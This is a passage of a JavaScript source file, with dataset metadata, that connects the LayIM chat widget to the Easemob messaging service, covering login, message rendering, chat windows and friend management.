"blob_id": "66fde0d8d04533ceea19ca363f89256d5d836e6c",
"content_id": "9f7529b71b5b16e9cd117c53978f3ff7b9977cc3",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 56745,
"license_type": "permissive",
"max_line_length": 662,
"num_lines": 1198,
"path": "/static/js/layer/layim/layim.easemob.js",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "Easemob.im.config = {\r\n xmppURL: 'im-api.easemob.com',\r\n apiURL: 'http://a1.easemob.com',\r\n appkey: \"ehand#ehand\",\r\n https: false,\r\n multiResources: true\r\n}\r\nDate.prototype.ToFormat = function (fmt) {\r\n var o = {\r\n \"M+\": this.getMonth() + 1,\r\n \"d+\": this.getDate(),\r\n \"h+\": this.getHours(),\r\n \"m+\": this.getMinutes(),\r\n \"s+\": this.getSeconds(),\r\n \"q+\": Math.floor((this.getMonth() + 3) / 3),\r\n \"S\": this.getMilliseconds()\r\n };\r\n if (/(y+)/.test(fmt))\r\n fmt = fmt.replace(RegExp.$1, (this.getFullYear() + \"\").substr(4 - RegExp.$1.length));\r\n for (var k in o)\r\n if (new RegExp(\"(\" + k + \")\").test(fmt))\r\n fmt = fmt.replace(RegExp.$1, (RegExp.$1.length == 1) ?\r\n\t\t\t\t(o[k]) : ((\"00\" + o[k]).substr((\"\" + o[k]).length)));\r\n return fmt;\r\n}\r\nvar layim = { easemob: {} };\r\nlayim.easemob.conn = new Easemob.im.Connection({\r\n multiResources: Easemob.im.config.multiResources,\r\n https: Easemob.im.config.https,\r\n url: Easemob.im.config.xmppURL\r\n});\r\n//初始化连接\r\nlayim.easemob.conn.init({\r\n https: Easemob.im.config.https,\r\n url: Easemob.im.config.xmppURL,\r\n //当连接成功时的回调方法\r\n onOpened: function () {\r\n if (layim.easemob.conn.isOpened())\r\n layim.easemob.conn.heartBeat(layim.easemob.conn);\r\n layim.easemob.xxim.online();\r\n layim.easemob.conn.setPresence();\r\n layim.easemob.conn.getRoster({\r\n success: function (roster) {\r\n layim.easemob.xxim.showuser(roster);\r\n }\r\n });\r\n },\r\n //当连接关闭时的回调方法\r\n onClosed: function () {\r\n layim.easemob.xxim.offline();\r\n },\r\n //收到文本消息时的回调方法\r\n onTextMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n layim.easemob.xxim.showhistory(message);\r\n },\r\n //收到表情消息时的回调方法\r\n onEmotionMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n var h = '';\r\n $(message.data).each(function (i, item) {\r\n if (item.type = 'emotion')\r\n h += '<img src=\"' + item.data + '\" />';\r\n else if (item.type = 'txt')\r\n h += item.data;\r\n });\r\n message.data = h;\r\n layim.easemob.xxim.showhistory(message);\r\n },\r\n //收到图片消息时的回调方法\r\n onPictureMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n message.data = '<a href=\"' + message.url + '\" target=\"_blank\"><img src=\"' + message.url + '\" /></a>';\r\n layim.easemob.xxim.showhistory(message);\r\n },\r\n //收到音频消息的回调方法\r\n onAudioMessage: function (message) { },\r\n //收到位置消息的回调方法\r\n onLocationMessage: function (message) { },\r\n //收到文件消息的回调方法\r\n onFileMessage: function (message) { },\r\n //收到视频消息的回调方法\r\n onVideoMessage: function (message) { },\r\n //收到联系人订阅请求的回调方法\r\n onPresence: function (message) {\r\n layim.easemob.xxim.showpresence(message);\r\n },\r\n //收到联系人消息的回调方法\r\n onRoster: function (message) {\r\n layim.easemob.conn.getRoster({\r\n success: function (roster) {\r\n layim.easemob.xxim.showuser(roster);\r\n }\r\n });\r\n },\r\n //收到群组邀请时的回调方法\r\n onInviteMessage: function (message) { },\r\n //异常时的回调方法\r\n onError: function (message) {\r\n layim.easemob.conn.curError = message;\r\n },\r\n //发送接收到消息\r\n onSendReceiptsMessage: function (message) {\r\n return false;\r\n },\r\n //透传消息\r\n onCmdMessage: function (message) {\r\n if (message.ext && message.ext.time) message.time = message.ext.time;\r\n for (var key in message.ext) {\r\n var value = message.ext[key];\r\n if (key == 'orderno')\r\n message.action = message.action.replace('[orderno]', '[<a href=\"/Shop/Order/Info?bllno=' + value + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n else if (key == 'refundno')\r\n message.action = message.action.replace('[refundno]', '[<a href=\"/Shop/Order/Refund?bllno=' + message.ext['orderno'] + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n else if (key == 'returnno')\r\n message.action = message.action.replace('[returnno]', '[<a href=\"/Shop/Order/Return?bllno=' + message.ext['orderno'] + '&bcd=' + message.ext['bcd'] + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n else if (key == 'sendno')\r\n message.action = message.action.replace('[sendno]', '[<a href=\"/Shop/Order/Send?bllno=' + message.ext['orderno'] + '&bcd=' + message.ext['bcd'] + '\" class=\"color-main\" target=\"_blank\">' + value + '</a>]');\r\n }\r\n message.data = message.action;\r\n layim.easemob.xxim.showhistory(message);\r\n }\r\n});\r\nlayim.easemob.conn.login = function (user, pwd) {\r\n layim.easemob.conn.open({\r\n apiUrl: Easemob.im.config.apiURL,\r\n user: user,\r\n pwd: pwd,\r\n appKey: Easemob.im.config.appkey\r\n });\r\n layim.easemob.conn.lastuser = user;\r\n layim.easemob.conn.lastpwd = pwd;\r\n layim.easemob.conn.stopInterval();\r\n layim.easemob.conn.myInterval = window.setInterval(function () {\r\n if (!layim.easemob.conn.isOpened() && !layim.easemob.conn.isOpening()) {\r\n layim.easemob.xxim.rconnect();\r\n }\r\n }, 2000);\r\n}\r\nlayim.easemob.conn.logout = function () {\r\n layim.easemob.conn.stopHeartBeat(layim.easemob.conn);\r\n layim.easemob.conn.close();\r\n}\r\nlayim.easemob.conn.stopInterval = function () {\r\n if (layim.easemob.conn.myInterval) {\r\n window.clearInterval(layim.easemob.conn.myInterval);\r\n layim.easemob.conn.myInterval = null;\r\n }\r\n}\r\nlayim.easemob.init = function (id, appkey, token, name, photo) {\r\n Easemob.im.config.appkey = appkey;\r\n layim.easemob.conn.login(id, token);\r\n var config = {\r\n msgurl: 'mailbox.html?msg=',\r\n chatlogurl: 'mailbox.html?user=',\r\n aniTime: 200,\r\n right: -230,\r\n api: {\r\n friend: 'js/plugins/layer/layim/data/friend.json', //好友列表接口\r\n group: 'js/plugins/layer/layim/data/group.json', //群组列表接口\r\n chatlog: 'js/plugins/layer/layim/data/chatlog.json', //聊天记录接口\r\n groups: 'js/plugins/layer/layim/data/groups.json', //群组成员接口\r\n sendurl: '' //发送消息接口\r\n },\r\n user: { //当前用户信息\r\n name: name,\r\n face: photo\r\n },\r\n //自动回复内置文案,也可动态读取数据库配置\r\n autoReplay: [\r\n '您好,我现在有事不在,一会再和您联系。',\r\n '你没发错吧?',\r\n '洗澡中,请勿打扰,偷窥请购票,个体四十,团体八折,订票电话:一般人我不告诉他!',\r\n '你好,我是主人的美女秘书,有什么事就跟我说吧,等他回来我会转告他的。',\r\n '我正在拉磨,没法招呼您,因为我们家毛驴去动物保护协会把我告了,说我剥夺它休产假的权利。',\r\n '<(@ ̄︶ ̄@)>',\r\n '你要和我说话?你真的要和我说话?你确定自己想说吗?你一定非说不可吗?那你说吧,这是自动回复。',\r\n '主人正在开机自检,键盘鼠标看好机会出去凉快去了,我是他的电冰箱,我打字比较慢,你慢慢说,别急……',\r\n '(*^__^*) 嘻嘻,是贤心吗?'\r\n ],\r\n chating: {},\r\n chatmsg: {},\r\n chatuser: {},\r\n presences: [],\r\n hosts: (function () {\r\n var dk = location.href.match(/\\:\\d+/);\r\n dk = dk ? dk[0] : '';\r\n return 'http://' + document.domain + dk + '/';\r\n })(),\r\n json: function (url, data, callback, error) {\r\n return $.ajax({\r\n type: 'POST',\r\n url: url,\r\n data: data,\r\n dataType: 'json',\r\n success: callback,\r\n error: error\r\n });\r\n },\r\n stopMP: function (e) {\r\n e ? e.stopPropagation() : e.cancelBubble = true;\r\n }\r\n }, dom = [$(window), $(document), $('html'), $('body')], xxim = {};\r\n layim.easemob.xxim = xxim;\r\n xxim.rconnect = function () {\r\n xxim.node.rconnect.html('').addClass('loading');\r\n layim.easemob.conn.login(id, token);\r\n }\r\n xxim.offline = function () {\r\n xxim.node.onlinetex.html('离线');\r\n xxim.node.online.addClass('xxim_offline');\r\n xxim.node.rconnect.removeClass('loading').html('重连');\r\n xxim.node.layimMin.parent().addClass('xxim_bottom_offline')\r\n if (xxim.layimNode.attr('state') != '1') xxim.expend();\r\n if (xxim.chatbox) xxim.chatbox.find('.layim_close').click();\r\n if (xxim.presencebox) layer.close(xxim.presencebox.parent().parent().attr('times'));\r\n xxim.node.list.find('.xxim_chatlist').html('');\r\n config.chatmsg = {};\r\n config.presences = [];\r\n xxim.showcount();\r\n }\r\n xxim.online = function () {\r\n xxim.node.onlinetex.html('在线');\r\n xxim.node.online.removeClass('xxim_offline');\r\n xxim.node.list.removeClass('loading');\r\n xxim.node.layimMin.parent().removeClass('xxim_bottom_offline');\r\n xxim.gochat();\r\n }\r\n //主界面tab\r\n xxim.tabs = function (index) {\r\n var node = xxim.node;\r\n node.tabs.eq(index).addClass('xxim_tabnow').siblings().removeClass('xxim_tabnow');\r\n node.list.eq(index).show().siblings('.xxim_list').hide();\r\n if (node.list.eq(index).find('li').length === 0) {\r\n }\r\n };\r\n\r\n //节点\r\n xxim.renode = function () {\r\n var node = xxim.node = {\r\n tabs: $('#xxim_tabs>span'),\r\n list: $('.xxim_list'),\r\n online: $('.xxim_online'),\r\n setonline: $('.xxim_setonline'),\r\n onlinetex: $('#xxim_onlinetex'),\r\n xximon: $('#xxim_on'),\r\n layimFooter: $('#xxim_bottom'),\r\n xximHide: $('#xxim_hide'),\r\n xximSearch: $('#xxim_searchkey'),\r\n searchMian: $('#xxim_searchmain'),\r\n closeSearch: $('#xxim_closesearch'),\r\n layimMin: $('#xxim_mymsg'),\r\n rconnect: $('#xxim_rconnect')\r\n };\r\n };\r\n\r\n //主界面缩放\r\n xxim.expend = function () {\r\n if (layim.easemob.noexpend) return;\r\n var node = xxim.node;\r\n if (xxim.layimNode.attr('state') !== '1') {\r\n xxim.layimNode.stop().animate({ right: config.right }, config.aniTime, function () {\r\n node.xximon.addClass('xxim_off');\r\n try {\r\n localStorage.layimState = 1;\r\n } catch (e) { }\r\n xxim.layimNode.attr({ state: 1 });\r\n node.xximHide.addClass('xxim_show');\r\n });\r\n node.layimFooter.addClass('xxim_expend').stop().animate({ marginLeft: config.right }, config.aniTime);\r\n } else {\r\n xxim.layimNode.stop().animate({ right: 0 }, config.aniTime, function () {\r\n node.xximon.removeClass('xxim_off');\r\n try {\r\n localStorage.layimState = 2;\r\n } catch (e) { }\r\n xxim.layimNode.removeAttr('state');\r\n node.layimFooter.removeClass('xxim_expend');\r\n node.xximHide.removeClass('xxim_show');\r\n });\r\n node.layimFooter.stop().animate({ marginLeft: 0 }, config.aniTime);\r\n }\r\n };\r\n\r\n //初始化窗口格局\r\n xxim.layinit = function () {\r\n if (!layim.easemob.noexpend) {\r\n var node = xxim.node;\r\n xxim.layimNode.attr({ state: 1 }).css({ right: config.right });\r\n node.xximon.addClass('xxim_off');\r\n node.layimFooter.addClass('xxim_expend').css({ marginLeft: config.right });\r\n node.xximHide.addClass('xxim_show');\r\n }\r\n ////主界面\r\n //try {\r\n // if (!localStorage.layimState)\r\n // localStorage.layimState = 1;\r\n // if (localStorage.layimState === '1') {\r\n // xxim.layimNode.attr({ state: 1 }).css({ right: config.right });\r\n // node.xximon.addClass('xxim_off');\r\n // node.layimFooter.addClass('xxim_expend').css({ marginLeft: config.right });\r\n // node.xximHide.addClass('xxim_show');\r\n // }\r\n //} catch (e) {\r\n //}\r\n xxim.tabs(2);\r\n };\r\n xxim.getobjecturl = function (file) {\r\n var url = null;\r\n if (window.createObjectURL != undefined) { // basic\r\n url = window.createObjectURL(file);\r\n } else if (window.URL != undefined) { // mozilla(firefox)\r\n url = window.URL.createObjectURL(file);\r\n } else if (window.webkitURL != undefined) { // webkit or chrome\r\n url = window.webkitURL.createObjectURL(file);\r\n }\r\n return url;\r\n };\r\n //聊天窗口\r\n xxim.popchat = function (param) {\r\n var node = xxim.node, log = {};\r\n\r\n log.success = function (layero) {\r\n xxim.chatbox = layero.find('#layim_chatbox');\r\n log.chatlist = xxim.chatbox.find('.layim_chatmore>ul');\r\n\r\n log.chatlist.html('<li data-id=\"' + param.id + '\" type=\"' + param.type + '\" id=\"layim_user' + param.type + param.id + '\"><span>' + param.name + '</span><em>×</em></li>')\r\n xxim.tabchat(param, xxim.chatbox);\r\n\r\n //最小化聊天窗\r\n xxim.chatbox.find('.layer_setmin').on('click', function () {\r\n layero.hide();\r\n node.layimMin.parent().removeClass('xxim_bottom_3');\r\n //node.layimMin.show();\r\n xxim.ischating = false;\r\n });\r\n\r\n //关闭窗口\r\n xxim.chatbox.find('.layim_close').on('click', function () {\r\n layer.close(layero.attr('times'));\r\n xxim.chatbox = null;\r\n config.chating = {};\r\n config.chatings = 0;\r\n xxim.ischating = false;\r\n });\r\n var addimage = xxim.chatbox.find('.layim_addimage');\r\n if (!Easemob.im.Helper.isCanUploadFileAsync) addimage.hide();\r\n //图片\r\n addimage.on('click', function () {\r\n if (!config.imageinput) {\r\n config.imageinput = $('<input type=\"file\" id=\"layim_imageinput\" style=\"display:none;\"/>');\r\n $(document.body).append(config.imageinput);\r\n config.imageinput.on('change', function () {\r\n var fileObj = Easemob.im.Helper.getFileUrl('layim_imageinput');\r\n if (!fileObj.url) return common.msg('请先选择图片!');\r\n if (['jpg', 'gif', 'png', 'bmp'].indexOf(fileObj.filetype) < 0) return common.msg('不支持此图片类型' + fileObj.filetype + '!');\r\n var layerindex = common.load();\r\n var time = xxim.gettime();\r\n var opt = {\r\n type: 'chat',\r\n fileInputId: 'layim_imageinput',\r\n filename: fileObj.filename,\r\n to: xxim.nowchat.id,\r\n apiUrl: Easemob.im.config.apiURL,\r\n onFileUploadError: function (error) {\r\n layer.close(layerindex);\r\n common.msg('发送图片失败!');\r\n },\r\n onFileUploadComplete: function (data) {\r\n console.log(data);\r\n layer.close(layerindex);\r\n var file = document.getElementById('layim_imageinput');\r\n var url = xxim.getobjecturl(file.files[0]);\r\n xxim.showmsg({\r\n id: xxim.nowchat.id,\r\n type: xxim.nowchat.type,\r\n time: time,\r\n name: config.user.name,\r\n face: config.user.face,\r\n content: '<a href=\"' + data.uri + '/' + data.entities[0].uuid + '\" target=\"_blank\"><img src=\"' + url + '\" /></a>'\r\n }, 'me');\r\n }, ext: { time: time }\r\n };\r\n layim.easemob.conn.sendPicture(opt);\r\n });\r\n }\r\n config.imageinput.click();\r\n });\r\n //表情\r\n xxim.chatbox.find('.layim_addface').on('click', function () {\r\n //var offset = $(layero).offset();\r\n var color = 'transparent';\r\n if (navigator.appName == 'Microsoft Internet Explorer' && navigator.appVersion.split(';')[1].replace(/[ ]/g, '') == 'MSIE9.0') {\r\n color = '#ddd';\r\n }\r\n var top = parseFloat(layero.css('top'));\r\n var left = parseFloat(layero.css('left'));\r\n if (!config.facehtml) {\r\n var h = '<ul class=\"layim_face_list\">';\r\n var data = Easemob.im.EMOTIONS.map;\r\n var path = Easemob.im.EMOTIONS.path;\r\n for (var key in data) {\r\n var src = path + data[key];\r\n h += '<li class=\"layim_face_item\" data-face=\"' + key + '\" data-src=\"' + src + '\"><img src=\"' + src + '\"/></li>';\r\n }\r\n h += '</ul>';\r\n config.facehtml = h;\r\n }\r\n layer.open({\r\n type: 1,\r\n title: false,\r\n skin: 'layui-layerim-face',\r\n closeBtn: false, //不显示关闭按钮\r\n shift: 0,\r\n move: false,\r\n shade: [0.1, color],\r\n shadeClose: true, //开启遮罩关闭\r\n offset: [(top + 356) + 'px', left + 'px'],\r\n area: ['432px', '135px'],\r\n border: false,\r\n content: config.facehtml,\r\n success: function (facelayer) {\r\n facelayer.on('click', '.layim_face_item', function () {\r\n layer.close(facelayer.attr('times'));\r\n var face = $(this).attr('data-face');\r\n var time = xxim.gettime();\r\n var src = $(this).attr('data-src');\r\n layim.easemob.conn.sendTextMessage({ to: xxim.nowchat.id, msg: face, type: \"chat\", ext: { time: time } });\r\n xxim.showmsg({\r\n id: xxim.nowchat.id,\r\n type: xxim.nowchat.type,\r\n time: time,\r\n name: config.user.name,\r\n face: config.user.face,\r\n content: '<img src=\"' + src + '\" />'\r\n }, 'me');\r\n });\r\n }\r\n });\r\n });\r\n //关闭某个聊天\r\n log.chatlist.on('mouseenter', 'li', function () {\r\n $(this).find('em').show();\r\n }).on('mouseleave', 'li', function () {\r\n $(this).find('em').hide();\r\n });\r\n log.chatlist.on('click', 'li em', function (e) {\r\n var parents = $(this).parent(), dataType = parents.attr('type');\r\n var dataId = parents.attr('data-id'), index = parents.index();\r\n var chatlist = log.chatlist.find('li'), indexs;\r\n\r\n config.stopMP(e);\r\n\r\n delete config.chating[dataType + dataId];\r\n config.chatings--;\r\n\r\n parents.remove();\r\n $('#layim_area' + dataType + dataId).remove();\r\n if (dataType === 'group') {\r\n $('#layim_group' + dataType + dataId).remove();\r\n }\r\n\r\n if (parents.hasClass('layim_chatnow')) {\r\n if (index === config.chatings) {\r\n indexs = index - 1;\r\n } else {\r\n indexs = index + 1;\r\n }\r\n xxim.tabchat(config.chating[chatlist.eq(indexs).attr('type') + chatlist.eq(indexs).attr('data-id')]);\r\n }\r\n\r\n if (log.chatlist.find('li').length === 1) {\r\n log.chatlist.parent().hide();\r\n }\r\n });\r\n\r\n //聊天选项卡\r\n log.chatlist.on('click', 'li', function () {\r\n var othis = $(this), dataType = othis.attr('type'), dataId = othis.attr('data-id');\r\n xxim.tabchat(config.chating[dataType + dataId]);\r\n });\r\n\r\n //发送热键切换\r\n log.sendType = $('#layim_sendtype'), log.sendTypes = log.sendType.find('span');\r\n $('#layim_enter').on('click', function (e) {\r\n config.stopMP(e);\r\n log.sendType.show();\r\n });\r\n log.sendTypes.on('click', function () {\r\n log.sendTypes.find('i').removeClass('fa-check');\r\n $(this).find('i').addClass('fa-check');\r\n });\r\n\r\n xxim.transmit();\r\n };\r\n\r\n log.html = '<div class=\"layim_chatbox\" id=\"layim_chatbox\">'\r\n + '<h6>'\r\n + '<span class=\"layim_move\"></span>'\r\n + ' <a href=\"javascript:layim.easemob.xxim.showuserinfo(layim.easemob.xxim.nowchat.id);\" class=\"layim_face\" target=\"_blank\"><img src=\"' + param.face + '\" ></a>'\r\n + ' <a href=\"javascript:layim.easemob.xxim.showuserinfo(layim.easemob.xxim.nowchat.id);\" class=\"layim_names\" target=\"_blank\">' + param.name + '</a>'\r\n + ' <span class=\"layim_rightbtn\">'\r\n + ' <i class=\"layer_setmin\">—</i>'\r\n + ' <i class=\"layim_close\">×</i>'\r\n + ' </span>'\r\n + '</h6>'\r\n + '<div class=\"layim_chatmore\" id=\"layim_chatmore\">'\r\n + ' <ul class=\"layim_chatlist\"></ul>'\r\n + '</div>'\r\n + '<div class=\"layim_groups\" id=\"layim_groups\"></div>'\r\n + '<div class=\"layim_chat\">'\r\n + ' <div class=\"layim_chatarea\" id=\"layim_chatarea\">'\r\n + ' <ul class=\"layim_chatview layim_chatthis\" id=\"layim_area' + param.type + param.id + '\"></ul>'\r\n + ' </div>'\r\n + ' <div class=\"layim_tool\">'\r\n + ' <i class=\"layim_addface fa fa-meh-o\" title=\"发送表情\"></i>'\r\n + ' <i class=\"layim_addimage fa fa-picture-o\" title=\"上传图片\"></i>'\r\n //+ ' <a href=\"javascript:void(0);\"><i class=\"layim_addfile fa fa-paperclip\" title=\"上传附件\"></i></a>'\r\n //+ ' <a href=\"javascript:void(0);\" target=\"_blank\" class=\"layim_seechatlog\"><i class=\"fa fa-comment-o\"></i>聊天记录</a>'\r\n + ' </div>'\r\n + ' <textarea class=\"layim_write\" id=\"layim_write\"></textarea>'\r\n + ' <div class=\"layim_send\">'\r\n + ' <div class=\"layim_sendbtn\" id=\"layim_sendbtn\">发送<span class=\"layim_enter\" id=\"layim_enter\"><em class=\"layim_zero\"></em></span></div>'\r\n + ' <div class=\"layim_sendtype\" id=\"layim_sendtype\">'\r\n + ' <span><i class=\"fa fa-check\"></i>按Enter键发送</span>'\r\n + ' <span><i class=\"fa\"></i>按Ctrl+Enter键发送</span>'\r\n + ' </div>'\r\n + ' </div>'\r\n + '</div>'\r\n + '</div>';\r\n if (config.chatings < 1) {\r\n layer.open({\r\n type: 1,\r\n border: [0],\r\n title: false,\r\n shade: false,\r\n skin: 'layui-layerim',\r\n area: ['620px', '492px'],\r\n move: '.layim_chatbox .layim_move',\r\n moveType: 1,\r\n closeBtn: false,\r\n zIndex: layer.zIndex,\r\n offset: [(($(window).height() - 493) / 2) + 'px', ''],\r\n content: log.html,\r\n success: function (layero) {\r\n log.success(layero);\r\n }\r\n });\r\n } else {\r\n log.chatmore = xxim.chatbox.find('#layim_chatmore');\r\n log.chatarea = xxim.chatbox.find('#layim_chatarea');\r\n\r\n log.chatmore.show();\r\n\r\n log.chatmore.find('ul>li').removeClass('layim_chatnow');\r\n log.chatmore.find('ul').append('<li data-id=\"' + param.id + '\" type=\"' + param.type + '\" id=\"layim_user' + param.type + param.id + '\" class=\"layim_chatnow\"><span>' + param.name + '</span><em>×</em></li>');\r\n\r\n log.chatarea.find('.layim_chatview').removeClass('layim_chatthis');\r\n log.chatarea.append('<ul class=\"layim_chatview layim_chatthis\" id=\"layim_area' + param.type + param.id + '\"></ul>');\r\n\r\n xxim.tabchat(param);\r\n }\r\n\r\n //群组\r\n log.chatgroup = xxim.chatbox.find('#layim_groups');\r\n if (param.type === 'group') {\r\n log.chatgroup.find('ul').removeClass('layim_groupthis');\r\n log.chatgroup.append('<ul class=\"layim_groupthis\" id=\"layim_group' + param.type + param.id + '\"></ul>');\r\n xxim.getGroups(param);\r\n }\r\n //点击群员切换聊天窗\r\n log.chatgroup.on('click', 'ul>li', function () {\r\n xxim.popchatbox($(this));\r\n });\r\n };\r\n xxim.settop = function ($obj) {\r\n layer.zIndex++;\r\n $obj.css('z-index', layer.zIndex);\r\n };\r\n //显示用户信息\r\n xxim.showuserinfo = function (id) {\r\n var $infobox = $('#layim_chatbox_info_' + id);\r\n if ($infobox.length) return xxim.settop($infobox.parent().parent());\r\n var node = xxim.node, log = {};\r\n var param = $.extend({ from: id }, xxim.getinfo(id, function (id, info) {\r\n xxim.setuserinfo(id, info);\r\n }));\r\n log.success = function (layero) {\r\n xxim.setuserinfo(id, $.extend({ from: id }, xxim.getinfo(id)));\r\n layero.find('.layim_close').on('click', function () {\r\n layer.close(layero.attr('times'));\r\n });\r\n layero.find('.layim_chatinfo_chatuser').on('click', function () {\r\n xxim.inchat($.extend({ from: id }, xxim.getinfo(id)));\r\n if (xxim.chatbox) xxim.settop(xxim.chatbox.parent().parent());\r\n });\r\n layero.find('.layim_chatinfo_adduser').on('click', function () {\r\n layer.confirm('<input class=\"layui-layer-text\" type=\"text\" placeholder=\"验证信息\" />', {\r\n title: '添加好友',\r\n btn: ['确定', '取消'],\r\n zIndex: layer.zIndex,\r\n skin: 'layui-layerim-dialog',\r\n shade: false,\r\n moveType: 1\r\n }, function (i, obj) {\r\n var val = obj.find('.layui-layer-text').val();\r\n layim.easemob.conn.subscribe({\r\n to: id,\r\n message: val\r\n });\r\n layer.msg('请求发送成功!', { zIndex: layer.zIndex });\r\n });\r\n });\r\n layero.find('.layim_chatinfo_deleteuser').on('click', function () {\r\n layer.confirm('是否删除好友?', {\r\n btn: ['删除', '取消'],\r\n zIndex: layer.zIndex,\r\n skin: 'layui-layerim-dialog',\r\n shade: false,\r\n moveType: 1\r\n }, function () {\r\n layim.easemob.conn.removeRoster({\r\n to: id,\r\n success: function () {\r\n layer.msg('删除成功!', { zIndex: layer.zIndex });\r\n layim.easemob.conn.unsubscribed({\r\n to: id\r\n });\r\n }\r\n });\r\n });\r\n });\r\n };\r\n log.html = '<div class=\"layim_chatbox layim_chatbox_info\" id=\"layim_chatbox_info_' + id + '\">'\r\n + '<h6>'\r\n + '<span class=\"layim_move\"></span>'\r\n + ' <a href=\"javascript:void(0);\" class=\"layim_face\" target=\"_blank\"><img class=\"layim_chatinfo_face\" src=\"' + param.face + '\" ></a>'\r\n + ' <div class=\"layim_rightinfos\">'\r\n + ' <div><span class=\"layim_chatinfo_name\">' + param.name + '</span><i class=\"fa fa-user layim_chatinfo_sex\" style=\"color:#4CAE4C;line-height:1.33em;margin-left:5px;display:none;\"></i></div>'\r\n + ' <div>用户号:<span class=\"layim_chatinfo_id\">' + id + '</span></div>'\r\n + ' <div>积分:<span class=\"layim_chatinfo_intg\">' + (param.intg || 0) + '</span></div>'\r\n + ' </div>'\r\n + ' <span class=\"layim_rightbtn\">'\r\n + ' <i class=\"layim_close\">×</i>'\r\n + ' </span>'\r\n + '</h6>'\r\n + '<div class=\"layim_chatinfo\">'\r\n + ' <div>电话号码:<span class=\"layim_chatinfo_phone\">' + (param.phone || '') + '</span></div>'\r\n + ' <div>地 区:<span class=\"layim_chatinfo_city\">' + (param.province || '') + (param.city || '') + (param.district || '') + '</span></div>'\r\n + '</div>'\r\n + '<div class=\"layim_chatinfo_bottom\">'\r\n + ' <div class=\"layim_chatinfo_btn layim_chatinfo_chatuser\">发送消息</div>'\r\n + ' <div class=\"layim_chatinfo_btn layim_chatinfo_adduser\">添加好友</div>'\r\n + ' <div class=\"layim_chatinfo_btn layim_chatinfo_deleteuser\" style=\"display:none;\">删除好友</div>'\r\n + '</div>'\r\n + '</div>';\r\n layer.open({\r\n type: 1,\r\n border: [0],\r\n title: false,\r\n shade: false,\r\n skin: 'layui-layerim',\r\n area: ['300px', '492px'],\r\n move: '.layim_chatbox .layim_move',\r\n zIndex: layer.zIndex,\r\n moveType: 1,\r\n closeBtn: false,\r\n offset: [(($(window).height() - 493) / 2) + 'px', ''],\r\n content: log.html,\r\n success: function (layero) {\r\n log.success(layero);\r\n }\r\n });\r\n };\r\n //得到好友信息\r\n xxim.getuserinfo = function (id) {\r\n var info = null;\r\n $(xxim.userlist).each(function (i, item) {\r\n if (item.subscription == 'both' || item.subscription == 'to') {\r\n if (item.name == id) info = item;\r\n }\r\n });\r\n return info;\r\n };\r\n //设置用户信息\r\n xxim.setuserinfo = function (id, info) {\r\n var $infobox = $('#layim_chatbox_info_' + id);\r\n if (!$infobox.length) return;\r\n $infobox.find('.layim_chatinfo_name').html(info.name);\r\n $infobox.find('.layim_chatinfo_face').attr('src', info.face);\r\n var $sex = $infobox.find('.layim_chatinfo_sex').hide();\r\n if (info.sex == 'M') $sex.css('color', '#4CAE4C').show();\r\n if (info.sex == 'F') $sex.css('color', '#FF808E').show();\r\n $infobox.find('.layim_chatinfo_intg').html(info.intg || 0);\r\n $infobox.find('.layim_chatinfo_phone').html(info.phone || '');\r\n $infobox.find('.layim_chatinfo_city').html((info.Province || '') + (info.city || '') + (info.district || ''));\r\n if (xxim.getuserinfo(id)) $infobox.find('.layim_chatinfo_deleteuser').show().siblings('.layim_chatinfo_adduser').hide();\r\n else $infobox.find('.layim_chatinfo_deleteuser').hide().siblings('.layim_chatinfo_adduser').show();\r\n };\r\n //缓存用户信息\r\n xxim.setinfo = function (info) {\r\n var chatuseritem = {\r\n name: info.MbrName,\r\n face: info.MbrPhoto,\r\n sex: info.Sex,\r\n intg: info.UseIntg,\r\n phone: info.Phone,\r\n province: info.Province,\r\n city: info.City,\r\n district: info.District\r\n };\r\n config.chatuser[info.MbrID] = chatuseritem;\r\n return chatuseritem;\r\n };\r\n //定位到某个聊天队列\r\n xxim.tabchat = function (param) {\r\n var node = xxim.node, log = {}, keys = param.type + param.id;\r\n xxim.nowchat = param;\r\n\r\n xxim.chatbox.find('#layim_user' + keys).addClass('layim_chatnow').siblings().removeClass('layim_chatnow');\r\n xxim.chatbox.find('#layim_area' + keys).addClass('layim_chatthis').siblings().removeClass('layim_chatthis');\r\n xxim.chatbox.find('#layim_group' + keys).addClass('layim_groupthis').siblings().removeClass('layim_groupthis');\r\n\r\n xxim.chatbox.find('.layim_face>img').attr('src', param.face).attr('class', 'layim_chatface_' + param.id);\r\n //xxim.chatbox.find('.layim_face, .layim_names').attr('href', param.href);\r\n xxim.chatbox.find('.layim_names').text(param.name).attr('class', 'layim_names layim_chatname_' + param.id);\r\n\r\n //xxim.chatbox.find('.layim_seechatlog').attr('href', config.chatlogurl + param.id);\r\n\r\n log.groups = xxim.chatbox.find('.layim_groups');\r\n if (param.type === 'group') {\r\n log.groups.show();\r\n } else {\r\n log.groups.hide();\r\n }\r\n $('#layim_write').focus();\r\n xxim.showusermsg(param.id, param.type);\r\n xxim.ischating = true;\r\n xxim.showcount(param.id);\r\n };\r\n xxim.getinfo = function (id, fn) {\r\n var info = config.chatuser[id];\r\n if (info) return info;\r\n else {\r\n if (id == 'admin') {\r\n info = { name: '物品在线助手', face: '/Files/Common/logo_80x80.png' };\r\n config.chatuser[id] = info;\r\n return info;\r\n }\r\n info = { name: id, face: '/Files/Shop/mbr-photo-default.png' };\r\n config.chatuser[id] = info;\r\n common.post('/Api/Shop/ShopMbrBLL/GetMbrChatInfo', { MbrID: id }, function (data) {\r\n var chatuseritem = xxim.setinfo(data.ResponseContent);\r\n if (xxim.node && xxim.node.list) {\r\n xxim.node.list.find('.layim_chatname_' + id).html(chatuseritem.name);\r\n xxim.node.list.find('.layim_chatface_' + id).attr('src', chatuseritem.face);\r\n }\r\n if (xxim.chatbox) {\r\n xxim.chatbox.find('.layim_chatname_' + id).html(chatuseritem.name);\r\n xxim.chatbox.find('.layim_chatface_' + id).attr('src', chatuseritem.face);\r\n }\r\n if (xxim.presencebox) {\r\n 